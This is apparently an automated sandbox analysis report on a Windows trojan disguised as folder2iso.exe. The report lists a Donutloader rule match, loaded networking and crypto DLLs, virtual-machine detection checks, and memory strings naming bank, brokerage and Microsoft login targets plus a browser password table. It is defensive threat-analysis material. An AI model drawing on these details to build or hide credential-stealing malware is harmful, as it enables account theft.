              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_0063EF100_2_0063EF10
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_0062D71C0_2_0062D71C
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_00622F930_2_00622F93
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02D904C70_2_02D904C7
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02DE0CB60_2_02DE0CB6
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02DB935C0_2_02DB935C
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02D953430_2_02D95343
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02D900000_2_02D90000
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02DC81930_2_02DC8193
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02DA11B30_2_02DA11B3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02D971B30_2_02D971B3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02D9A6930_2_02D9A693
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02D966A30_2_02D966A3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02D984030_2_02D98403
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02DCD5930_2_02DCD593
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02D99A630_2_02D99A63
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02DCD8B30_2_02DCD8B3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02DB68530_2_02DB6853
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02DB29930_2_02DB2993
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02D97EE30_2_02D97EE3
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02DC4F530_2_02DC4F53
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_031F10200_2_031F1020
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_031D4D300_2_031D4D30
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_031D80F00_2_031D80F0
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_031D65700_2_031D6570
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_032035E00_2_032035E0
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_031D6A900_2_031D6A90
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_031D39D00_2_031D39D0
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_031F79E90_2_031F79E9
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_032068200_2_03206820
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_031D58400_2_031D5840
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_031DF8400_2_031DF840
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_0320BF400_2_0320BF40
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_031F4EE00_2_031F4EE0
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_031D8D200_2_031D8D20
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_0320BC200_2_0320BC20
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: String function: 0063162F appears 36 times
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: String function: 031DF9C0 appears 162 times
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: String function: 00632FF0 appears 40 times
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: String function: 02DA1333 appears 161 times
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: String function: 02D9A493 appears 69 times
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: String function: 031D8B20 appears 70 times
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: String function: 00640E7D appears 31 times
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 1728
              Source: 6RVmzn1DzL.exeStatic PE information: invalid certificate
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2103088189.00000000032D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamefolder2iso.exe0 vs 6RVmzn1DzL.exe
              Source: 6RVmzn1DzL.exeBinary or memory string: OriginalFilenamefolder2iso.exe0 vs 6RVmzn1DzL.exe
              Source: 6RVmzn1DzL.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 00000000.00000002.2399357546.0000000002D90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
              Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@2/5@1/1
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_02D90BD7 CreateToolhelp32Snapshot,Thread32First,Wow64SuspendThread,FindCloseChangeNotification,0_2_02D90BD7
              Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3276
              Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\f991d166-a1fc-4b2d-8540-b78852e4b9a6Jump to behavior
              Source: 6RVmzn1DzL.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2134615582.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134411528.0000000003B19000.00000004.00000800.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2148025189.00000000012CD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
              Source: 6RVmzn1DzL.exeReversingLabs: Detection: 18%
              Source: 6RVmzn1DzL.exeVirustotal: Detection: 18%
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeFile read: C:\Users\user\Desktop\6RVmzn1DzL.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\6RVmzn1DzL.exe "C:\Users\user\Desktop\6RVmzn1DzL.exe"
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3276 -s 1728
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: webio.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: 6RVmzn1DzL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
              Source: 6RVmzn1DzL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
              Source: 6RVmzn1DzL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
              Source: 6RVmzn1DzL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: 6RVmzn1DzL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
              Source: 6RVmzn1DzL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
              Source: 6RVmzn1DzL.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: 6RVmzn1DzL.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
              Source: Binary string: folder2iso.pdb source: 6RVmzn1DzL.exe
              Source: 6RVmzn1DzL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
              Source: 6RVmzn1DzL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
              Source: 6RVmzn1DzL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
              Source: 6RVmzn1DzL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
              Source: 6RVmzn1DzL.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_00633035 push ecx; ret 0_2_00633048
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006315E8 push ecx; ret 0_2_006315FB
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_00621DB1 SetDlgItemTextW,GetPrivateProfileStringW,SHGetFolderPathW,lstrlenW,0_2_00621DB1
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006220BD IsIconic,ShowWindow,DragQueryFileW,DragFinish,0_2_006220BD
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006229E6 ShowWindow,ShowWindow,IsIconic,ShowWindow,SetForegroundWindow,GetCommandLineW,lstrlenW,LocalAlloc,GetCurrentDirectoryW,lstrcpyW,SendMessageW,LocalFree,0_2_006229E6
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_00622775 lstrlenW,CommandLineToArgvW,GlobalFree,IsIconic,ShowWindow,SetForegroundWindow,0_2_00622775
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_00632C9C GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00632C9C
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Query firmware table information (likely to detect VMs)
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exe TID: 2352Thread sleep time: -210000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\6RVmzn1DzL.exeCode function: 0_2_006410FF FindFirstFileW,0_2_006410FF
              Source: Amcache.hve.5.drBinary or memory string: VMware
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696428655d
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: - GDCDYNVMware20,11696428655p
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696428655
              Source: Amcache.hve.5.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
              Source: 6RVmzn1DzL.exe, 00000000.00000002.2398263626.000000000123E000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2146970871.000000000123E000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000002.2398263626.000000000120E000.00000004.00000020.00020000.00000000.sdmp, 6RVmzn1DzL.exe, 00000000.00000003.2134170058.000000000123E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
              Source: Amcache.hve.5.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
              Source: Amcache.hve.5.drBinary or memory string: vmci.sys
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B33000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: YNVMware
              Source: Amcache.hve.5.drBinary or memory string: VMware20,1
              Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Generation Counter
              Source: Amcache.hve.5.drBinary or memory string: NECVMWar VMware SATA CD00
              Source: Amcache.hve.5.drBinary or memory string: VMware Virtual disk SCSI Disk Device
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696428655]
              Source: Amcache.hve.5.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
              Source: Amcache.hve.5.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
              Source: Amcache.hve.5.drBinary or memory string: VMware PCI VMCI Bus Device
              Source: Amcache.hve.5.drBinary or memory string: VMware VMCI Bus Device
              Source: Amcache.hve.5.drBinary or memory string: VMware Virtual RAM
              Source: Amcache.hve.5.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696428655
              Source: Amcache.hve.5.drBinary or memory string: vmci.inf_amd64_68ed49469341f563
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
              Source: Amcache.hve.5.drBinary or memory string: VMware Virtual USB Mouse
              Source: Amcache.hve.5.drBinary or memory string: vmci.syshbin
              Source: Amcache.hve.5.drBinary or memory string: VMware, Inc.
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
              Source: Amcache.hve.5.drBinary or memory string: VMware20,1hbin@
              Source: Amcache.hve.5.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
              Source: Amcache.hve.5.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
              Source: Amcache.hve.5.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
              Source: Amcache.hve.5.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
              Source: 6RVmzn1DzL.exe, 00000000.00000003.2147917172.0000000003B2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
              Source: Amcache.hve.5.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
